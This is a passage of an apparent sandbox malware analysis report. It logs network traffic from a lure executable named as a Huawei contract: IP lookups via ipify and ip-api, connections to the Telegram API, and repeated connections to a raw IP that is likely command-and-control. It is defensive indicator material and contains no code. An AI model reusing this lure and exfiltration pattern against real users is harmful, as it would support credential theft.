                                                                                                                                                                                            Feb 17, 2025 19:35:39.922727108 CET4977880192.168.2.6104.26.12.205
                                                                                                                                                                                            Feb 17, 2025 19:35:39.927525997 CET8049778104.26.12.205192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:39.927598953 CET4977880192.168.2.6104.26.12.205
                                                                                                                                                                                            Feb 17, 2025 19:35:39.933170080 CET4977880192.168.2.6104.26.12.205
                                                                                                                                                                                            Feb 17, 2025 19:35:39.937935114 CET8049778104.26.12.205192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:40.392990112 CET8049778104.26.12.205192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:40.419847965 CET4978580192.168.2.6208.95.112.1
                                                                                                                                                                                            Feb 17, 2025 19:35:40.424674034 CET8049785208.95.112.1192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:40.424813032 CET4978580192.168.2.6208.95.112.1
                                                                                                                                                                                            Feb 17, 2025 19:35:40.427426100 CET4978580192.168.2.6208.95.112.1
                                                                                                                                                                                            Feb 17, 2025 19:35:40.432238102 CET8049785208.95.112.1192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:40.469309092 CET4977880192.168.2.6104.26.12.205
                                                                                                                                                                                            Feb 17, 2025 19:35:40.894540071 CET8049785208.95.112.1192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:40.970978975 CET4978580192.168.2.6208.95.112.1
                                                                                                                                                                                            Feb 17, 2025 19:35:41.298034906 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:41.298067093 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:41.298337936 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:41.318811893 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:41.318854094 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:41.942131042 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:41.942212105 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:41.957515001 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:41.957565069 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:41.958223104 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.065037012 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.078275919 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.078557968 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.078820944 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.078875065 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.078902960 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.079122066 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.079227924 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.079468966 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.079540968 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.079648018 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.079695940 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.079942942 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.079987049 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080482960 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080503941 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080775023 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080799103 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080857992 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080883026 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080887079 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080909014 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080916882 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080934048 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080976009 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.080992937 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081012011 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081027985 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081051111 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081077099 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081079960 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081115961 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081130981 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081283092 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081305027 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081336975 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081355095 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081382990 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081398964 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081442118 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081460953 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081495047 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081512928 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081532001 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081546068 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081568956 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081583977 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081621885 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081640005 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081672907 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081691980 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081705093 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081828117 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081847906 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081882954 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081917048 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.081950903 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082099915 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082130909 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082171917 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082217932 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082250118 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082250118 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082272053 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082294941 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082330942 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082353115 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082384109 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082421064 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082552910 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082587004 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082607985 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082711935 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082793951 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.089186907 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.091689110 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.091710091 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.091958046 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.135337114 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:44.867142916 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:44.867465973 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:44.869961977 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:44.873233080 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:44.873255968 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:45.866719961 CET4982480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.866723061 CET4982580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.871732950 CET804982589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:45.871768951 CET804982489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:45.871851921 CET4982580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.872101068 CET4982480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.872164965 CET4982580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.872361898 CET4982480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.880336046 CET804982589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:45.881961107 CET804982489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.248764038 CET804982589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.249077082 CET4982580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.250710011 CET4982580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.252804041 CET4996080192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.255525112 CET804982589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.257649899 CET804996089.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.257755041 CET4996080192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.258047104 CET4996080192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.262475967 CET804982489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.262561083 CET4982480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.262789965 CET4982480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.262886047 CET804996089.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.263463974 CET4996180192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.267632008 CET804982489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.268348932 CET804996189.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.268426895 CET4996180192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.268609047 CET4996180192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.273430109 CET804996189.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.657526016 CET804996189.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.657629013 CET4996180192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.658075094 CET4996180192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.658914089 CET4999480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.659477949 CET804996089.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.659655094 CET4996080192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.659729004 CET4996080192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.660226107 CET4999580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.662884951 CET804996189.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.663794041 CET804999489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.663908958 CET4999480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.664127111 CET4999480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.664501905 CET804996089.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.665154934 CET804999589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.665283918 CET4999580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.665585995 CET4999580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.668936968 CET804999489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.670463085 CET804999589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.027364969 CET804999589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.028855085 CET4999580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.029215097 CET4999580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.029949903 CET4999880192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.030814886 CET804999489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.030883074 CET4999480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.030982018 CET4999480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.031357050 CET4999980192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.033996105 CET804999589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.034759045 CET804999889.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.034846067 CET4999880192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.035737991 CET804999489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.036197901 CET804999989.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.036835909 CET4999980192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.036993980 CET4999980192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.037058115 CET4999880192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.041743040 CET804999989.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.041796923 CET804999889.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:54.675223112 CET4977880192.168.2.6104.26.12.205
                                                                                                                                                                                            Feb 17, 2025 19:36:54.680267096 CET8049778104.26.12.205192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:54.680360079 CET4977880192.168.2.6104.26.12.205
                                                                                                                                                                                            Feb 17, 2025 19:36:55.441047907 CET4978580192.168.2.6208.95.112.1
                                                                                                                                                                                            Feb 17, 2025 19:36:55.446345091 CET8049785208.95.112.1192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:55.446448088 CET4978580192.168.2.6208.95.112.1
                                                                                                                                                                                            Feb 17, 2025 19:37:11.386657953 CET804999889.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.386733055 CET4999880192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:37:11.387125969 CET4999880192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:37:11.391385078 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.391433001 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.391522884 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.391890049 CET804999889.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.392316103 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.392340899 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.402390957 CET804999989.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.402767897 CET4999980192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:37:11.402769089 CET4999980192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:37:11.404488087 CET50002443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.404522896 CET44350002149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.404598951 CET50002443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.405046940 CET50002443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.405065060 CET44350002149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.407568932 CET804999989.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.998653889 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.999639988 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.999674082 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.000777006 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:12.000783920 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.038059950 CET44350002149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.043436050 CET50002443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:12.043461084 CET44350002149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.044178963 CET50002443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:12.044183969 CET44350002149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.246578932 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.246690989 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.246815920 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:12.247526884 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:12.247550011 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.293179989 CET44350002149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.293328047 CET44350002149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.293416977 CET50002443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:12.293838024 CET50002443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:12.293852091 CET44350002149.154.167.220192.168.2.6

                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Feb 17, 2025 19:35:25.437515974 CET5826253192.168.2.61.1.1.1
                                                                                                                                                                                            Feb 17, 2025 19:35:25.444791079 CET53582621.1.1.1192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:39.667628050 CET4987853192.168.2.61.1.1.1
                                                                                                                                                                                            Feb 17, 2025 19:35:39.917751074 CET53498781.1.1.1192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:40.411098957 CET5178353192.168.2.61.1.1.1
                                                                                                                                                                                            Feb 17, 2025 19:35:40.417887926 CET53517831.1.1.1192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:41.290235996 CET6165853192.168.2.61.1.1.1
                                                                                                                                                                                            Feb 17, 2025 19:35:41.297075987 CET53616581.1.1.1192.168.2.6

                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                            Feb 17, 2025 19:35:25.437515974 CET192.168.2.61.1.1.10xed4bStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Feb 17, 2025 19:35:39.667628050 CET192.168.2.61.1.1.10xa751Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                            Feb 17, 2025 19:35:40.411098957 CET192.168.2.61.1.1.10xfdb1Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Feb 17, 2025 19:35:41.290235996 CET192.168.2.61.1.1.10xbc9cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                            Feb 17, 2025 19:35:25.444791079 CET1.1.1.1192.168.2.60xed4bNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                                                                            Feb 17, 2025 19:35:25.444791079 CET1.1.1.1192.168.2.60xed4bNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                                                                            Feb 17, 2025 19:35:25.444791079 CET1.1.1.1192.168.2.60xed4bNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                                                                            Feb 17, 2025 19:35:39.917751074 CET1.1.1.1192.168.2.60xa751No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                            Feb 17, 2025 19:35:39.917751074 CET1.1.1.1192.168.2.60xa751No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                            Feb 17, 2025 19:35:39.917751074 CET1.1.1.1192.168.2.60xa751No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                            Feb 17, 2025 19:35:40.417887926 CET1.1.1.1192.168.2.60xfdb1No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                            Feb 17, 2025 19:35:41.297075987 CET1.1.1.1192.168.2.60xbc9cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • pastebin.com
                                                                                                                                                                                            • api.telegram.org
                                                                                                                                                                                            • api.ipify.org
                                                                                                                                                                                            • ip-api.com
                                                                                                                                                                                            • 89.23.97.214

                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.649778104.26.12.205802356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Feb 17, 2025 19:35:39.933170080 CET39OUTGET / HTTP/1.1
                                                                                                                                                                                            Host: api.ipify.org
                                                                                                                                                                                            Feb 17, 2025 19:35:40.392990112 CET429INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 17 Feb 2025 18:35:40 GMT
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 9137e0e91d440c94-EWR
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1618&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=39&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                            Data Ascii: 8.46.123.189


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            1192.168.2.649785208.95.112.1802356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Feb 17, 2025 19:35:40.427426100 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                            Feb 17, 2025 19:35:40.894540071 CET482INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 17 Feb 2025 18:35:40 GMT
                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                            Content-Length: 305
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            X-Ttl: 60
                                                                                                                                                                                            X-Rl: 44
                                                                                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                            Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/Chicago","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
